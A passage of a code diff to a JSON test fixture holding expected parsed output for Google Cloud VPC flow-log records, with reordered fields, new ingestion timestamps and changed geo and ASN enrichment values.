sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466706102Z", @@ -12085,43 +12675,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 9200, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "Europe", - "country_name": "rou", - "city_name": "Bucharest", - "region_name": "Bucharest" - }, - "as": { - "number": 24940 - }, - "address": "67.43.156.14", - "port": 37292, - "bytes": 310476, - "ip": "67.43.156.14", - "packets": 214 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", - "bytes": 310476, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 214, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -12132,6 +12685,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -12152,8 +12708,33 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 9200, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 37292, + "bytes": 310476, + "ip": "67.43.156.14", + "packets": 214 + }, "event": { - "ingested": "2021-12-09T13:37:46.391822500Z", + "ingested": "2021-12-14T14:43:27.415236443Z", "original": "{\"insertId\":\"ptjoddfhmrhgp\",\"jsonPayload\":{\"bytes_sent\":\"310476\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":37292},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:35.841633589Z\",\"packets_sent\":\"214\",\"reporter\":\"DEST\",\"rtt_msec\":\"102\",\"src_location\":{\"asn\":24940,\"city\":\"Bucharest\",\"continent\":\"Europe\",\"country\":\"rou\",\"region\":\"Bucharest\"},\"start_time\":\"2019-06-14T03:40:35.048156283Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:35.048156283Z", @@ -12161,44 +12742,21 @@ "id": "ptjoddfhmrhgp", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 59790, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1784, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:tW5o1L9SEuS4pptFcAjo5fF6q5w=", - "bytes": 1784, + "community_id": "1:7OTMfKZcYuKruC84JJAOtMtMx6w=", + "bytes": 310476, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, + "packets": 214, + "direction": "inbound" + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -12209,6 +12767,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -12229,8 +12790,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 59790, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1784, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391826900Z", + "ingested": "2021-12-14T14:43:27.415236944Z", "original": "{\"insertId\":\"ptjoddfhmrhg8\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":59790,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:50.590894439Z", @@ -12238,6 +12824,18 @@ "id": "ptjoddfhmrhg8", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:tW5o1L9SEuS4pptFcAjo5fF6q5w=", + "bytes": 1784, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -12246,11 +12844,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33552, @@ -12328,7 +12931,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391830200Z", + "ingested": "2021-12-14T14:43:27.415237427Z", "original": "{\"insertId\":\"ptjoddfhmrhgf\",\"jsonPayload\":{\"bytes_sent\":\"209716\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"262\",\"reporter\":\"SRC\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075957044Z", @@ -12344,11 +12947,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33556, @@ -12426,7 +13034,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391834400Z", + "ingested": "2021-12-14T14:43:27.415237931Z", "original": "{\"insertId\":\"ptjoddfhmrhgg\",\"jsonPayload\":{\"bytes_sent\":\"165643\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"256\",\"reporter\":\"SRC\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:03.062674441Z", @@ -12437,18 +13045,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:15.857Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.139.99.242", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 220 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65257, @@ -12462,6 +13103,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415238315Z", + "original": "{\"insertId\":\"ptjoddfhmrhgb\",\"jsonPayload\":{\"bytes_sent\":\"65890\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65257,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"593\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.403388091Z", + "end": "2019-06-14T03:49:56.220614265Z", + "id": "ptjoddfhmrhgb", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -12473,51 +13124,11 @@ "iana_number": "6", "packets": 593, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:15.857Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 220 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391839400Z", - "original": "{\"insertId\":\"ptjoddfhmrhgb\",\"jsonPayload\":{\"bytes_sent\":\"65890\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65257,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"593\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.403388091Z", - "end": "2019-06-14T03:49:56.220614265Z", - "id": "ptjoddfhmrhgb", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + } + }, + { + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, "destination": { "address": "10.139.99.242", @@ -12527,11 +13138,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33538, @@ -12603,7 +13219,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391844200Z", + "ingested": "2021-12-14T14:43:27.415238717Z", "original": "{\"insertId\":\"ptjoddfhmrhgs\",\"jsonPayload\":{\"bytes_sent\":\"62620\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074952616Z", @@ -12619,11 +13235,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33692, @@ -12701,7 +13322,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391849600Z", + "ingested": "2021-12-14T14:43:27.415239213Z", "original": "{\"insertId\":\"ptjoddfhmrhge\",\"jsonPayload\":{\"bytes_sent\":\"185520\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.558259934Z", @@ -12712,43 +13333,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65262, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 33269, - "packets": 517, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", - "bytes": 33269, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 517, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" @@ -12759,6 +13343,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC" @@ -12776,8 +13363,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65262, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 33269, + "packets": 517, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.391853100Z", + "ingested": "2021-12-14T14:43:27.415239666Z", "original": "{\"insertId\":\"ptjoddfhmrhgc\",\"jsonPayload\":{\"bytes_sent\":\"33269\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65262,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"517\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.251430011Z", @@ -12785,6 +13397,18 @@ "id": "ptjoddfhmrhgc", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", + "bytes": 33269, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 517, + "direction": "outbound" } }, { @@ -12799,11 +13423,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33556, @@ -12875,7 +13504,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391858400Z", + "ingested": "2021-12-14T14:43:27.415240083Z", "original": "{\"insertId\":\"ptjoddfhmrhg7\",\"jsonPayload\":{\"bytes_sent\":\"58811\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:03.062674441Z", @@ -12891,11 +13520,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -12970,7 +13604,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391889200Z", + "ingested": "2021-12-14T14:43:27.415240486Z", "original": "{\"insertId\":\"ptjoddfhmrhgq\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933338264Z\",\"packets_sent\":\"86\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466706102Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466706102Z", @@ -12981,43 +13615,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.139.99.242", - "port": 22, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "source": { - "geo": { - "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" - }, - "as": { - "number": 4837 - }, - "address": "67.43.156.14", - "port": 41818, - "bytes": 0, - "ip": "67.43.156.14", - "packets": 4 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:iiFy+S+g1JJvu9kZvA1ivEiN2EM=", - "bytes": 0, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 4, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" @@ -13028,6 +13625,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -13048,8 +13648,33 @@ } } }, + "destination": { + "address": "10.139.99.242", + "port": 22, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 41818, + "bytes": 0, + "ip": "67.43.156.14", + "packets": 4 + }, "event": { - "ingested": "2021-12-09T13:37:46.391895Z", + "ingested": "2021-12-14T14:43:27.415240968Z", "original": "{\"insertId\":\"bxuq05fhgmw9d\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":41818},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:13.478093057Z\",\"packets_sent\":\"4\",\"reporter\":\"DEST\",\"rtt_msec\":\"1350\",\"src_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:11.031370298Z", @@ -13057,6 +13682,18 @@ "id": "bxuq05fhgmw9d", "category": "network", "type": "connection" + }, + "tags": [ + 